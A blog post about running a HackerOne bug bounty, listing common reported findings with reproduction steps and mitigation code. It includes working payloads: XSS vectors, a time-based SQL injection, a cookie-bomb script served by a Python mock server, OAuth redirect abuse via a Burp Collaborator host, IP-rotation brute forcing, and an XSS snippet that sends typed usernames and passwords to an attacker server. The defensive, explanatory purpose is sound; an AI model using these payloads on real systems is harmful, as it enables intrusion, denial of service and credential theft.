I was recently involved in a bug bounty program, and here I share my experiences of working with ethical hackers from the hackerone.com community. In this article, let us look at some common findings from hackers, how to reproduce them, how the program workflow works, and how to assess the findings based on the CVSS severity matrix.



Let us start with understanding how a bug bounty program works.

HackerOne offers different types of bug bounty programs: either a fully managed program or a self-managed program. Here is what the workflow of a fully managed bug bounty program looks like, and how to prepare for it.

Prerequisites:

- Know your asset types (Tier 1, Tier 2, etc.)

- Know your reward amount for each tier

- Loyalty bonus details (if any)

- Clear documentation on the application testing scope

- Technical information for hackers, such as API Swagger specifications, interface details, etc.

- Clear documentation on your trust boundaries (network and machine).

Once the above preparations are done and your application is onboarded to the program, the hacker reporting workflow begins.

By now, you should have a basic understanding of how bug bounty programs work.

Let us now discuss some of the common findings I came across during the bug bounty programs.

- Reflected XSS in Swagger UI — DOMPurify component

- HTML Injections in Email Templates

- Open redirect attack — token exchange auth flow

- SQL injection attack on the application tables

- Path traversal attack on admin directories

- Stored XSS via POST request

- IDOR attack — Chat box conversation scenario

- DOM XSS with Cookie Bomb attack

- Unauthenticated access to databases

- Reflected XSS — user authentication flow

- Bruteforce attack — bypassing rate limit with IP rotation

Reflected XSS in Swagger UI — DOMPurify component

Many hackers reported this finding. It is low-hanging fruit and usually the first thing everyone targets in a Swagger UI. This finding mostly has a low or medium impact on the product, but it is still easily exploitable and can lead to injection attacks.

How to exploit:

1. Craft a JSON payload containing the XSS vector and host it at a publicly reachable URL; the example below uses a GitHub gist.

2. Go to your Swagger UI path, add the query parameter “configUrl”, and pass the payload URL as its value:

https://{{YOUR_DOMAIN}}/swagger/index.html?configUrl=https://gist.githubusercontent.com/ramkrivas/c47c4a49bea5f3ff99a9e6229298a6ba/raw/e2e610ea302541a37604c7df8bcaebdcb109b3ba/xsstest.json

If your Swagger UI is running with a vulnerable version of DOMPurify, the XSS payload above will be executed in your Swagger UI application. That's it! You are one of the victims.

Impact:

With the help of the DOMPurify vulnerability, the injected script executes in your Swagger UI and can expose information such as your cookies or other sensitive data from the browser context.
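The real fix is to upgrade Swagger UI to a release that bundles a patched DOMPurify. As an extra server-side guard, you can refuse Swagger UI requests that try to load an external config or spec through the query string, which is exactly what the “configUrl” trick relies on. Below is a minimal Python sketch; the helper name, the assumption that the page is served as index.html, and the assumption that you never need the “configUrl” or “url” query parameters in production are all hypothetical choices for illustration.

```python
from urllib.parse import urlparse, parse_qs

# Query parameters Swagger UI can use to load an external config or spec.
# Assumption: this deployment never needs them in production.
OVERRIDE_PARAMS = {"configurl", "url"}


def has_swagger_config_override(request_url: str) -> bool:
    """Return True if a Swagger UI request tries to load config/spec from the query string."""
    parsed = urlparse(request_url)
    if not parsed.path.endswith("index.html"):
        return False  # only guard the Swagger UI page itself
    # keep_blank_values so that "?configUrl=" is still detected
    params = parse_qs(parsed.query, keep_blank_values=True)
    # Compare case-insensitively so "URL" or "ConfigURL" cannot slip through
    return any(name.lower() in OVERRIDE_PARAMS for name in params)


if __name__ == "__main__":
    attack = "https://example.com/swagger/index.html?configUrl=https://attacker.example/xsstest.json"
    print(has_swagger_config_override(attack))  # True
    print(has_swagger_config_override("https://example.com/swagger/index.html"))  # False
```

A request flagged by this check can simply be answered with 400 Bad Request before the Swagger UI page is served.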

HTML Injections in Email Templates

This is one of the usual hacks hackers attempt when your application sends out emails based on user interactions. It is possible because of inadequate sanitisation of user inputs.

How to exploit:

Take the example of a user signing up to your web application: on successful signup, the application sends a welcome email to the user. Hackers can try to embed HTML into this welcome email in multiple ways. Sometimes the signup form does not sanitise its inputs and accepts special characters, which makes HTML injection possible directly from the form. In other cases, the form POST can be intercepted and the HTML injected into the request body.

Here is a sample intercepted signup form submission with the HTML injection embedded:

```http
POST /dbconnections/signup HTTP/2
Host: yourdomain.com
Content-Type: application/json
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Origin: https://auth.yourdomain.com
Content-Length: 628
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15

{"email":"hacker123@gmail.com",
"password":"hackers@123*",
"user_metadata":{"given_name":"<s>John${{4*4}}","family_name":"Doe",
"locale_code":"\"><s><h1>HEHEHAHAHA</h1><br>\"><a href=//google.com>",
"LocaleId":"1"}}
```

Normally, the UI doesn't allow users to enter special characters in the name inputs. So here, the submitted form request was intercepted and the “locale_code” parameter was changed to the HTML payload shown above. Then we waited for the activation email: within a few seconds it arrived, with the injected HTML rendered in the user's context. It is also possible to inject anchor tags and mount more complex attacks against victims through emails sent by your SMTP server.

Impact:

The impact of this vulnerability can be significant: an attacker can take advantage of the trust users have in the platform to redirect them to fraudulent sites (phishing, etc.) or even push them to perform undesirable actions from their accounts. Programs generally rate the severity of this vulnerability between low and medium.
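The usual mitigation is to HTML-escape every user-controlled value before it is placed into the email body, including values such as “locale_code” that normally never contain markup. Below is a minimal Python sketch using the standard library's html.escape and string.Template; the template text and the render_welcome_email helper are hypothetical and only stand in for your real email template. If you use a template engine, enabling its auto-escaping achieves the same goal.

```python
import html
from string import Template

# Hypothetical welcome-email template; every $placeholder is user-controlled.
WELCOME_TEMPLATE = Template(
    '<html lang="$locale_code"><p>Welcome, $given_name $family_name!</p></html>'
)


def render_welcome_email(user_metadata: dict) -> str:
    """Render the welcome email, HTML-escaping each user-supplied value first."""
    safe = {
        # quote=True also escapes " and ', so a value cannot break out of an attribute
        key: html.escape(str(user_metadata.get(key, "")), quote=True)
        for key in ("given_name", "family_name", "locale_code")
    }
    # substitute() inserts the escaped values as-is; it does not re-parse them
    return WELCOME_TEMPLATE.substitute(safe)


if __name__ == "__main__":
    print(render_welcome_email(
        {"given_name": "<s>John${{4*4}}", "family_name": "Doe", "locale_code": "en"}
    ))
    # <html lang="en"><p>Welcome, &lt;s&gt;John${{4*4}} Doe!</p></html>
```

The injected tags now arrive in the inbox as visible text instead of rendered markup.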

Open redirect attack — token exchange auth flow

This is a common attack scenario in user authentication workflows, mainly OAuth2 flows, where users get redirected to a specific URL either for the token exchange or to an application's landing page.

```
https://{{YOUR-AUTH_DOMAIN}}/openid-connect/auth?client_id=authorization_code_flow&redirect_uri=http://ua8j7t88q7ud3hz3f9tbja1nue05ou.burpcollaborator.net&state=00350ec61-f32b-4ffa-9892-711521ddf152b&response_mode=fragment&response_type=code&scope=openid&nonce=60824a30-489-4819-9af-db8284fcd029
```

In the normal scenario, this URL starts the OAuth2 authorization code flow: the authorization server authenticates the user and redirects to “redirect_uri” with an authorization code, which the application then exchanges for an access token. Here, the hacker changes “redirect_uri” to an attacker-controlled URL, “http://ua8j7t88q7ud3hz3f9tbja1nue05ou.burpcollaborator.net”, a Burp Collaborator endpoint that records the incoming redirect and the user data it carries. If the authorization server does not validate “redirect_uri” against the values registered for the client, that data ends up with the attacker.

Impact:

An open redirect can be chained into more serious vulnerabilities. In this case, it can lead to the theft of the user's session cookies: the redirect can go unnoticed and the user cannot see where their data is being sent, which can give the attacker access to any account, including system administrators.
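The standard defence is for the authorization server to compare “redirect_uri” against the URIs registered for the client using exact string matching, as recommended by the OAuth 2.0 Security Best Current Practice. Below is a minimal Python sketch of that check; the client registry and the callback URL in it are hypothetical placeholders, not values from any real deployment.

```python
# Hypothetical registry: client_id -> redirect URIs registered for that client.
REGISTERED_REDIRECTS = {
    "authorization_code_flow": {"https://app.example.com/callback"},
}


def is_allowed_redirect(client_id: str, redirect_uri: str) -> bool:
    """Accept redirect_uri only if it exactly matches a URI registered for client_id."""
    allowed = REGISTERED_REDIRECTS.get(client_id, set())
    # Exact string comparison: no prefix, substring or wildcard matching,
    # which are the usual ways redirect_uri checks get bypassed.
    return redirect_uri in allowed


if __name__ == "__main__":
    print(is_allowed_redirect("authorization_code_flow", "https://app.example.com/callback"))  # True
    print(is_allowed_redirect(
        "authorization_code_flow",
        "http://ua8j7t88q7ud3hz3f9tbja1nue05ou.burpcollaborator.net",
    ))  # False
```

When the check fails, the server should show an error page instead of redirecting anywhere, since redirecting to the unvalidated URI is the vulnerability itself.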

SQL injection attack on the application tables

SQL injection is a very common attack that every hacker is proud to find :-). An attacker can use SQL injection to bypass a web application's authentication and authorisation mechanisms and retrieve the contents of an entire database.

SQLi can also be used to add, modify and delete records in a database, affecting data integrity. Under the right circumstances, SQLi can also be used by an attacker to execute OS commands, which may then be used to escalate an attack even further.

Here is a sample time-based SQL injection where the application query is vulnerable to executing a sleep command:

```http
GET /{{your-app-path}}/admin.php?action=get-achievements&total_only=true&user_id=11%20AND%20(SELECT%209628%20FROM%20(SELECT(SLEEP(15)))WOrh)--%20KUsb HTTP/2
```

In the above URL, the hacker has replaced the “user_id” value with an injected SQL SLEEP command. If your application code is vulnerable to SQL injection, the response of the GET endpoint above will take about 15 seconds.

Path traversal attack on admin directories

Many hackers attempted this hack. It mainly targeted the admin screens, where files and folders are protected from public access.

Take the sample URL below, which leads to the admin console:

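https://{{YOUR_DOMAIN}}/auth/admin/master/console/config

If you try to access this URL, you will get 403 Forbidden. As a hack, add a semicolon (;) after the word admin, for example: https://{{YOUR_DOMAIN}}/auth/admin;/master/console/config

You will then see that you can access all the files, so the URL is now open to a path traversal attack. This typically works when the front-end proxy that returns the 403 and the back-end server parse the path differently: the proxy does not match “/auth/admin;/” against its block rule, while a back end that treats “;” as the start of a path parameter (as Java servlet containers do) strips it and serves “/auth/admin/master/console/config”.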

In scenarios where the directory name is passed in the request headers, the protection can be bypassed using Burp Suite's “Match and Replace” feature (https://portswigger.net/burp/documentation/desktop/tutorials/using-match-and-replace).
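Because the bypass exploits a parsing mismatch, the access rule should be applied to the path after it has been normalized the way the back end will see it. Below is a minimal Python sketch, assuming a servlet-style back end that drops “;param” segments; PROTECTED_PREFIX and both helpers are hypothetical, and a real deployment would rather fix the proxy configuration or enforce authorization in the application itself. It does not cover the header-based variant.

```python
import posixpath
from urllib.parse import unquote

PROTECTED_PREFIX = "/auth/admin"  # hypothetical: path the proxy is meant to block


def normalize_path(raw_path: str) -> str:
    """Normalize a request path roughly the way a servlet-style back end would."""
    path = unquote(raw_path)
    # Drop ";param" path parameters from every segment: /admin;/x -> /admin/x
    segments = [segment.split(";", 1)[0] for segment in path.split("/")]
    # Collapse leading slashes, then resolve "." / ".." segments and "//"
    joined = "/".join(segments).lstrip("/")
    return posixpath.normpath("/" + joined)


def is_blocked(raw_path: str) -> bool:
    """Apply the admin block rule to the normalized path, not the raw one."""
    path = normalize_path(raw_path)
    return path == PROTECTED_PREFIX or path.startswith(PROTECTED_PREFIX + "/")


if __name__ == "__main__":
    print(normalize_path("/auth/admin;/master/console/config"))  # /auth/admin/master/console/config
    print(is_blocked("/auth/admin;/master/console/config"))  # True
```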

Stored XSS — POST request

This is a variant of stored XSS that hackers tried against different API instances. In the example below, a POST request is made to a user authentication API, storing user information that carries a malicious XSS payload.

```http
POST /api/Authentication/AuthenticateUser HTTP/2
Host: bugbounty-is.bugbounty.com:553
Content-Type: application/json; charset=utf-8
Cookie: ASP.NET_SessionId=25jqpkfplyfwwgkt5hxqhjtu; Guid=bc5308-e597-4145-a62b-81523236f9dd
Content-Length: 263

{
  "UserName":"username",
  "Password":"password",
  "Device":"PC'\"><script src=https://ls.bxss.in/>.techlabcorp.local"
}
```

The next time users log in to the application, the XSS payload is executed in the application.

IDOR attack — Chat box conversation scenario

A few hackers attempted IDOR (Insecure Direct Object Reference) attacks, mainly against chat conversation features.

In the example below, a hacker attempted to delete other users' chats in a chat group and succeeded through an IDOR attack.

Here is an example DELETE request that accepts two URL parameters, “chat_id” and “message_id”:

```http
DELETE /chat/threads/<chat_id>/messages/<message_id> HTTP/2
```

A hacker who knows the chat group ID can try random or sequential message IDs belonging to other users' chats and successfully delete those messages, because the server never checks that the requester is allowed to act on the referenced object.
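The fix is an explicit authorization check on every object lookup: before deleting, the server must confirm that the message belongs to the given chat and that the caller is allowed to delete it. Below is a minimal Python sketch, assuming only a message's author may delete it (group admins would need an extra rule); the Message type, the in-memory MESSAGES store and delete_message are hypothetical stand-ins for the real chat service. Making IDs non-sequential helps against guessing but does not replace this check.

```python
from dataclasses import dataclass


@dataclass
class Message:
    message_id: int
    chat_id: str
    author_id: str


class Forbidden(Exception):
    """Raised when the caller may not act on the referenced object."""


# Hypothetical in-memory store standing in for the chat service database.
MESSAGES = {
    1653045685393: Message(1653045685393, "thread-1", "alice"),
}


def delete_message(current_user: str, chat_id: str, message_id: int) -> None:
    """Delete a message only if it belongs to chat_id and was written by current_user."""
    message = MESSAGES.get(message_id)
    # Same error for "missing" and "not yours", so valid IDs cannot be probed.
    if message is None or message.chat_id != chat_id or message.author_id != current_user:
        raise Forbidden("message not found")
    del MESSAGES[message_id]
```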

In the sample request below, the “message_id” (guessed from the sequence) belongs to another user's message:

```http
DELETE /chat/threads/19%3AMqmTpSDKj-121asdSDFsdsAA21%40thread.v1/messages/1653045685393 HTTP/2
Host: yourdomain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer Access_Token
Origin: yourdomain.com
Referer: yourdomain.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
X-Pwnfox-Color: blue
```

DOM XSS and Cookie Bomb attack

Many hackers reported different flavours of DOM XSS where the UI lacks sanitisation. This attack takes advantage of a DOM XSS, exploits it with a cookie bomb, and ends up causing a kind of denial of service.

A cookie bomb is the ability to set a large number of large cookies for a domain and its subdomains, so that the victim always sends HTTP requests too large for the server to accept. This causes a DoS for that user on the domain and its subdomains.

Below is a sample cookie bomb snippet. This script can be converted to base64 and injected into the mock service's GET response.

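```html
<script>
// Parent domain, e.g. ".example.com" when the page runs on "app.example.com"
var base_domain = document.domain.substr(document.domain.indexOf('.'));
// 3999-character cookie value
var pollution = Array(4000).join('a');
// Set 98 large cookies scoped to the parent domain and all its subdomains
for(var i=1;i<99;i++){
    document.cookie='bomb'+i+'='+pollution+';Domain='+base_domain;
}
</script>
```

```python
import ssl
from http.server import HTTPServer, BaseHTTPRequestHandler


class ServiceHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # JSON whose "mediaName" holds an <img onerror> payload: atob() decodes the
        # base64 cookie bomb script above and eval() runs it in the victim's page
        response = '[{"mediaName": "<img src=x onerror=eval(atob(\'dmFyIGJhc2VfZG9tYWluID0gZG9jdW1lbnQuZG9tYWluLnN1YnN0cihkb2N1bWVudC5kb21haW4uaW5kZXhPZignLicpKTsKdmFyIHBvbGx1dGlvbiA9IEFycmF5KDQwMDApLmpvaW4oJ2EnKTsKZm9yKHZhciBpPTE7aTw5OTtpKyspewogICAgZG9jdW1lbnQuY29va2llPSdib21iJytpKyc9Jytwb2xsdXRpb24rJztEb21haW49JytiYXNlX2RvbWFpbjsKfQ==\'))><h1>Cr33sspb0sy</h1>" }]'
        self.send_response(200)
        # Let the vulnerable page, served from another origin, read this response
        self.send_header('Access-Control-Allow-Origin', '*')
        self.send_header('Content-type', 'application/json')
        self.end_headers()
        self.wfile.write(bytes(response, 'utf-8'))


# Server initialization: HTTPS on port 8080 with a local key/certificate pair
server = HTTPServer(('', 8080), ServiceHandler)
# ssl.wrap_socket() was deprecated and removed in Python 3.12; use an SSLContext
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile="cert.pem", keyfile="key.pem")
server.socket = context.wrap_socket(server.socket, server_side=True)
server.serve_forever()
```

Run the above mock service and assume it is accessible via https://{{MOCK_VICTIM_SERVICE_IP}}:8080.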

Below is the vulnerable code in the application which can lead to DOM XSS.

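```javascript
function getMedia() {
  // Read redirect_uri from the current page URL
  const redirectUrl = decodeURIComponent(
    getQueryString('redirect_uri', window.location.href)
  );
  // Read mediaUrl from inside redirect_uri: fully attacker-controlled
  let mediaQueryString = getQueryString('mediaUrl', redirectUrl);
  // Fetch from whatever URL was supplied and render the response in the UI
  fetch(mediaQueryString).then((response) => populateMedia(response));
}
```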

The above script reads the media URL from a query parameter and makes an AJAX request to it; the response from that API is then rendered in the UI without sanitisation.

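With the above setup, if a user opens a crafted URL whose “redirect_uri” contains a “mediaUrl” pointing at the mock service, the user can no longer navigate to the website: the browser now holds 98 cookies of almost 4,000 bytes each (close to the roughly 4 KB per-cookie limit) and sends them all with every request, far more than the server is willing to accept. This works because the attacker can serve arbitrary JavaScript from their own server, and the client downloads and executes it.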
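The arithmetic behind the DoS can be checked with a short sketch that rebuilds the Cookie header the sample script produces (98 cookies named bomb1 to bomb98, each with a 3999-character value). The 8 KB comparison is an assumption: many web servers default to a per-header limit in that range, but check your own server's configuration. The helper name is hypothetical.

```python
def cookie_bomb_header_size(count: int = 98, value_len: int = 3999) -> int:
    """Size in bytes of the Cookie header produced by the sample cookie bomb.

    Mirrors the script: Array(4000).join('a') yields 3999 'a' characters, and
    for (i = 1; i < 99; i++) sets the cookies bomb1 .. bomb98.
    """
    pairs = [f"bomb{i}={'a' * value_len}" for i in range(1, count + 1)]
    # Browsers join cookies in the request header with "; "
    return len("; ".join(pairs))


if __name__ == "__main__":
    size = cookie_bomb_header_size()
    print(size)
    # Assumed server limit of about 8 KB per header line
    print(size > 8 * 1024)
```

The result is close to 400 KB per request, which is why every request from the poisoned browser is rejected until the cookies are cleared.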

Unauthenticated access to time series DBs

Hackers attempted this hack against time series DBs such as InfluxDB. The root cause is that the InfluxDB instances are configured without authentication.

Here is how you can access unprotected DBs using curl:

```shell
# Gets the list of DBs
curl -i -s -k -X $'GET' \
  -H $'Host: {{YOUR_DB_INSTANCE}}:8086' -H $'User-Agent: curl/7.77.0' -H $'Accept: */*' -H $'Connection: close' \
  $'http://{{YOUR_DB_INSTANCE}}:8086/query?db=db&q=SHOW%20databases'

# Gets the list of measurements (tables) in a DB
curl -i -s -k -X $'GET' \
  -H $'Host: {{YOUR_DB_INSTANCE}}:8086' -H $'User-Agent: curl/7.77.0' -H $'Accept: */*' -H $'Connection: close' \
  $'http://{{YOUR_DB_INSTANCE}}:8086/query?db=_internal&q=SHOW%20Measurements'
```

Impact:

The risk is high if the unauthenticated user has full read and write access to the DB instance.
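After enabling authentication (in InfluxDB 1.x this is the auth-enabled setting in the [http] section of the config), it is worth verifying that your own instance really rejects anonymous queries. Below is a minimal Python sketch using only the standard library; the helper name is hypothetical, and it assumes the instance answers 200 when queries are open and 401 when credentials are required. Any other status is raised so you can inspect it.

```python
import urllib.error
import urllib.parse
import urllib.request


def influx_allows_anonymous_query(base_url: str, timeout: float = 5.0) -> bool:
    """Return True if base_url answers SHOW DATABASES without any credentials."""
    query = urllib.parse.urlencode({"q": "SHOW DATABASES"})
    try:
        with urllib.request.urlopen(f"{base_url}/query?{query}", timeout=timeout) as resp:
            return resp.status == 200
    except urllib.error.HTTPError as err:
        if err.code == 401:
            return False  # authentication is enforced
        raise  # unexpected status: surface it instead of guessing


if __name__ == "__main__":
    # Replace with your own instance, e.g. "http://{{YOUR_DB_INSTANCE}}:8086"
    print(influx_allows_anonymous_query("http://localhost:8086"))
```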

Bruteforce attack — bypassing rate limit with IP rotation

One interesting hack I saw was bypassing the rate-limit protection with IP rotation, so that a password brute-force attack still works.

Normally, the login page is rate-limited as a countermeasure against malicious users trying random passwords via brute force. But there is still a way to bypass the rate limit: IP rotation.

IP rotation is a process where IP addresses are assigned to a device at random or at scheduled intervals. Because each request can come from a different IP address, a rate limit that counts requests per IP never triggers.

How to set up IP rotation and reproduce the brute force:

1. Go to your AWS account and copy your access key and secret key.

2. In Burp Suite Pro, install the IP Rotate extension and paste in the keys.

3. Set the target domain (yourDomain.com).

4. Enable IP rotation.

Exploiting brute force on the login page request:

a) Go to your login page and log in with a username and password.

b) Intercept that request and send it to Intruder.

c) Select the password field as the payload position.

d) In the payload settings, add a password list.

Then start the attack. Because the rate limit never triggers, the password brute force continues until it finds the correct password.

Impact:

A malicious user can use this technique to bypass the rate limit, keep brute-forcing an account's password, and fully take over the victim's account without any user interaction.

Reflected XSS — User authentication flow

This is a common scenario in many applications with a user authentication flow, and of course many hackers attempt it. After successful authentication, the user claims are fetched from a service such as userInfoservice.

Here, the hacker creates a mock service that returns an XSS payload as its response, which is then rendered in the UI without sanitisation.

Let us create a mock webhook service URL (we can leverage https://webhook.site/) that returns the XSS payload below:

```html
<img src='x' onerror='$(\"#email\").change(function(){
fetch(\"<yourserver>?username=\" + $( this ).val());});
$(\"#password\").change(function(){fetch(\"<yourserver>?password=\" + $( this ).val());})'>
```

Then craft a login URL whose “redirect_uri” passes the webhook URL in the “userServiceUrl” parameter:

```
https://{{YOUR_DOMAIN}}/login?client=SDFGFG34323&protocol=oauth2&response_type=code&redirect_uri={{YOUR_DOMAIN}}%3FuserServiceUrl%3D<VICTIM_WEBHOOKURL>&scope=openid%20email
```

When the user navigates to the page through the above URL, the XSS payload executes: it captures the username and password as they are typed and sends them to the attacker's server.
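The root problem is that the page lets the URL decide where user claims are fetched from. Ideally the user-info endpoint is fixed in configuration; if it must be configurable, it should at least be restricted to HTTPS URLs on an allowlisted host, and the returned claims should still be escaped before rendering. Below is a minimal Python sketch of the allowlist check; TRUSTED_USERINFO_HOSTS and the helper are hypothetical.

```python
from urllib.parse import urlparse

# Hypothetical allowlist of hosts permitted to serve user claims.
TRUSTED_USERINFO_HOSTS = {"userinfo.example.com"}


def is_trusted_userinfo_url(url: str) -> bool:
    """Accept a user-info service URL only if it is https and on an allowlisted host."""
    parsed = urlparse(url)
    # parsed.hostname is lower-cased and excludes any port or user:password@ prefix,
    # so "https://userinfo.example.com@webhook.site/" resolves to "webhook.site"
    return parsed.scheme == "https" and parsed.hostname in TRUSTED_USERINFO_HOSTS


if __name__ == "__main__":
    print(is_trusted_userinfo_url("https://userinfo.example.com/me"))  # True
    print(is_trusted_userinfo_url("https://webhook.site/abc"))  # False
```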

I hope you liked the post and learned something new 👍. If so, please give me some applause 👏